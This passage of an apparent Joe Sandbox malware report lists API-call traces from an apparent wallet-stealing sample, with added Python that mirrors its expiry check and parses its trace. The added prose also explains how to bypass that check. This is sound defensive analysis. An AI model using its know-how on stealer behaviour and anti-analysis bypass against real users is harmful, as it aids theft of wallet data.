                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: d3375014cea43031a6a3a87897a9678b8c1df895fe7befa7a3ca58a51ef58d7c
                                • Instruction ID: dac61c762a10f662f30bb75d85a85e7b642fee66d3aefb9462b478e76c72e44f
                                • Opcode Fuzzy Hash: d3375014cea43031a6a3a87897a9678b8c1df895fe7befa7a3ca58a51ef58d7c
                                • Instruction Fuzzy Hash: D9615E75A50208AFDB28EFA4CC96FED7775BF44304F048118F90A9F192EB706A45DB52
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00C4696C
                                • sscanf.NTDLL ref: 00C46999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C469B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C469C0
                                • ExitProcess.KERNEL32 ref: 00C469DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 03a5d5951847db2f18000d8578f1f804dccc2f651e29417838c0f2ac6fdc649f
                                • Instruction ID: bbdb9b450b98a056d6c840cc88b7d4dc4e9053ac0e906248e22c998ff1303f63
                                • Opcode Fuzzy Hash: 03a5d5951847db2f18000d8578f1f804dccc2f651e29417838c0f2ac6fdc649f
                                • Instruction Fuzzy Hash: 7021EA75D04208AFDF08EFE4E9499EEB7B5BF48300F04852AE41AB3250EB345609CB66
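
The call chain above (GetSystemTime, sscanf, two SystemTimeToFileTime conversions, then ExitProcess at 00C469DA) has the shape of a hard-coded expiry check: the current date and an embedded date string are both converted to FILETIME and compared, and the process exits if the deadline has passed. The Python below is an added example, not code from the report or from the sample, that mirrors that arithmetic so the comparison can be reproduced offline. The sscanf format string is not visible in the report, so the 'YYYY-MM-DD' format in parse_deadline is an assumption made for this example only.

```python
from datetime import datetime, timezone

# Added example (not part of the Joe Sandbox report or the sample): a Python
# mirror of the GetSystemTime -> sscanf -> SystemTimeToFileTime x2 -> ExitProcess
# chain at 00C4696C..00C469DA, i.e. the shape of a hard-coded expiry check.

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # a FILETIME counts 100-nanosecond intervals


def systemtime_to_filetime(year: int, month: int, day: int,
                           hour: int = 0, minute: int = 0, second: int = 0) -> int:
    """Equivalent of SystemTimeToFileTime: 64-bit tick count since 1601-01-01 UTC."""
    dt = datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND


def parse_deadline(text: str) -> tuple[int, int, int]:
    """Stand-in for the sscanf call. The real format string is not shown in the
    report; 'YYYY-MM-DD' is an assumption used only for this example."""
    year, month, day = (int(part) for part in text.split("-"))
    return year, month, day


def should_exit(now: tuple[int, int, int], deadline: str) -> bool:
    """True when the current date is past the embedded deadline, i.e. when the
    sample would take the ExitProcess path instead of continuing."""
    return systemtime_to_filetime(*now) > systemtime_to_filetime(*parse_deadline(deadline))


if __name__ == "__main__":
    # Constructed values: a deadline one year before a 2024 analysis run.
    print(should_exit((2024, 10, 8), "2023-10-08"))  # True: sample would exit
    print(should_exit((2023, 1, 1), "2023-10-08"))   # False: sample keeps running
```

The practical consequence for triage: a build whose deadline has already passed looks inert in a sandbox because it exits before reaching any stealer logic. Re-running with the analysis VM clock set before the deadline, or patching the comparison that follows the second SystemTimeToFileTime call, restores the full behaviour.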
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C47E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,019EB9F0,00000000,00020119,?), ref: 00C47E5E
                                • RegQueryValueExA.ADVAPI32(?,019FDF60,00000000,00000000,000000FF,000000FF), ref: 00C47E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00C47E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 2408f0725655bf02c29892ffddbea53502a67b5de796209c8c4a5bbb4a8cada5
                                • Instruction ID: 074f3c998993c1ee3f773f4b9f474fcc115dd2070a7941626f9b3756b8b8773b
                                • Opcode Fuzzy Hash: 2408f0725655bf02c29892ffddbea53502a67b5de796209c8c4a5bbb4a8cada5
                                • Instruction Fuzzy Hash: 12119EB1A44205EFD714CF96DC49FBFBBB8FB44B11F104269FA19A7280D77458448BA2
                                APIs
                                • StrStrA.SHLWAPI(019FEAF0,?,?,?,00C4140C,?,019FEAF0,00000000), ref: 00C4926C
                                • lstrcpyn.KERNEL32(00E7AB88,019FEAF0,019FEAF0,?,00C4140C,?,019FEAF0), ref: 00C49290
                                • lstrlen.KERNEL32(?,?,00C4140C,?,019FEAF0), ref: 00C492A7
                                • wsprintfA.USER32 ref: 00C492C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 65f9723c1dfb9f69dffc7af861c15161e24a4550ec677cd9733b19d9f5f3e885
                                • Instruction ID: 28876ff8b42362dc6559dcc23428857f4689c530d048d04c378d6f7cb0d45bdf
                                • Opcode Fuzzy Hash: 65f9723c1dfb9f69dffc7af861c15161e24a4550ec677cd9733b19d9f5f3e885
                                • Instruction Fuzzy Hash: CA01E975500108FFCB04DFE8C989EAE7BB9EB84351F148158F909AB200C671AA84DB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C312B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C312BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C312D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C312F5
                                • RegCloseKey.ADVAPI32(?), ref: 00C312FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 547e4fbe46c81b838e4184819c29e58d3e41b5bb5e31121aef6162c703d37545
                                • Instruction ID: cc50ff314bea2a6fcedc98e33b51c9ca0b1af74312210505acee6038ffae1396
                                • Opcode Fuzzy Hash: 547e4fbe46c81b838e4184819c29e58d3e41b5bb5e31121aef6162c703d37545
                                • Instruction Fuzzy Hash: 570149B5A40208BFDB04DFD1DC49FAEB7BCEB88701F048155FA09E7280D6719A458F51
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C46663
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00C46726
                                • ExitProcess.KERNEL32 ref: 00C46755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: 15667b520a7b59246857345257d210bd1953ee04d44ce0e79db77209ce1c0f25
                                • Instruction ID: e696c0407e519717f425ceaa921f1f18a762fc3e7d01dffd573a767634519459
                                • Opcode Fuzzy Hash: 15667b520a7b59246857345257d210bd1953ee04d44ce0e79db77209ce1c0f25
                                • Instruction Fuzzy Hash: 043129B1801218AEEB14EBA0DC96BDEB778BF54300F404199F20976191DF746B89DF6A
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C50E28,00000000,?), ref: 00C4882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C48836
                                • wsprintfA.USER32 ref: 00C48850
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 2523d72af5aa42835b935578563581522d0d130ce7e61e38a9ca00defc0aabf2
                                • Instruction ID: 1af1bd7091b57e298001ce37945bf9e690a004dc15e5fa3eea4bb93ad845d9d2
                                • Opcode Fuzzy Hash: 2523d72af5aa42835b935578563581522d0d130ce7e61e38a9ca00defc0aabf2
                                • Instruction Fuzzy Hash: C52130B1A40204AFDB04DFD5DD49FAEBBB8FB48701F144169F609B7280C77999448BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C4951E,00000000), ref: 00C48D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C48D62
                                • wsprintfW.USER32 ref: 00C48D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 0369ca3acb2b4c2845fa90cff2909a0d1ca3424edbead2772259e0ebbef62215
                                • Instruction ID: 095d7da9c801bd7be6e0732987677f78e7540a6bbb865775ddad10362dfefdbe
                                • Opcode Fuzzy Hash: 0369ca3acb2b4c2845fa90cff2909a0d1ca3424edbead2772259e0ebbef62215
                                • Instruction Fuzzy Hash: CDE08CB4A40208BFD704DB95DC0EE6D77BCEB84702F0800A4FD0DA7280DA719E489BA6
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00C3A3FF
                                • lstrlen.KERNEL32(00000000), ref: 00C3A6BC
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00C3A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: d6b7584c5af3f2619a6c79c59b32abe5a6e98dcf547b751af9e9b0f22b85e5ad
                                • Instruction ID: b86c1a46df95812064394d63fd708a5952333ebb78e9584a6ebe85c475cc6ae3
                                • Opcode Fuzzy Hash: d6b7584c5af3f2619a6c79c59b32abe5a6e98dcf547b751af9e9b0f22b85e5ad
                                • Instruction Fuzzy Hash: 93E1EE72850108ABEB14FBA4DC96EEE7338FF54300F548169F516B2091EF306A4DEB66
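
Two patterns in the listings above are worth decoding rather than reading raw. The registry functions at 00C47E5E and 00C312D7 call RegOpenKeyExA with hive 80000002 and access mask 00020119, and the function at 00C3A2E1 copies a file, measures it, and deletes it, with the string \Monero\wallet.keys reaching the path-building subcalls. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It parses API lines in the shape this listing uses, expands the REGSAM mask into named rights, and pairs each CopyFileA with the DeleteFileA that follows it. The trace it runs on is constructed for the example from lines copied off this page and joined into one sequence; no other functions or constants are taken from the sample.

```python
import re
from dataclasses import dataclass, field

# Added example (not part of the report or the sample): parse Joe Sandbox style
# API lines, decode RegOpenKeyExA arguments, and flag copy-then-delete staging.

# Constructed trace: lines copied in shape from the listing above and joined into
# one call sequence for this example.
TRACE = r"""
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47E37
RtlAllocateHeap.NTDLL(00000000), ref: 00C47E3E
RegOpenKeyExA.ADVAPI32(80000002,019EB9F0,00000000,00020119,?), ref: 00C47E5E
RegQueryValueExA.ADVAPI32(?,019FDF60,00000000,00000000,000000FF,000000FF), ref: 00C47E7F
RegCloseKey.ADVAPI32(?), ref: 00C47E92
lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3A2E1
wsprintfA.USER32 ref: 00C492C7
DeleteFileA.KERNEL32(00000000), ref: 00C3A743
"""

# "Api.MODULE(args), ref: ADDR" with the argument list optional (see wsprintfA).
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
# KEY_READ = STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_READ = 0x20019
SAM_BITS = {
    0x0002: "KEY_SET_VALUE",
    0x0004: "KEY_CREATE_SUB_KEY",
    0x0020: "KEY_CREATE_LINK",
    0x0100: "KEY_WOW64_64KEY",
    0x0200: "KEY_WOW64_32KEY",
}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    args: list = field(default_factory=list)  # int for hex literals, None for '?', str otherwise


def parse_arg(token: str):
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token  # e.g. a path such as \Monero\wallet.keys


def parse_trace(text: str) -> list[ApiCall]:
    calls = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised line: {line!r}")
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["mod"], m["ref"], args))
    return calls


def decode_sam(sam: int) -> list[str]:
    """Expand a REGSAM access mask into named rights, KEY_READ first."""
    names = []
    if sam & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        sam &= ~KEY_READ
    for bit, name in sorted(SAM_BITS.items()):
        if sam & bit:
            names.append(name)
            sam &= ~bit
    if sam:
        names.append(f"0x{sam:X}")  # leftover bits we did not name
    return names


def describe_reg_open(call: ApiCall) -> str:
    hive, _subkey, _options, sam = call.args[:4]
    return f"{HIVES.get(hive, hex(hive))} opened with {' | '.join(decode_sam(sam))}"


def find_copy_then_delete(calls: list[ApiCall]) -> list[tuple[str, str]]:
    """Pair each CopyFileA with the next DeleteFileA: copy to staging, then clean up."""
    pairs, pending = [], []
    for c in calls:
        if c.api == "CopyFileA":
            pending.append(c.ref)
        elif c.api == "DeleteFileA" and pending:
            pairs.append((pending.pop(0), c.ref))
    return pairs


def wallet_references(calls: list[ApiCall]) -> list[str]:
    return [a for c in calls for a in c.args if isinstance(a, str) and "wallet" in a.lower()]


if __name__ == "__main__":
    calls = parse_trace(TRACE)
    for c in calls:
        if c.api == "RegOpenKeyExA":
            print(c.ref, describe_reg_open(c))
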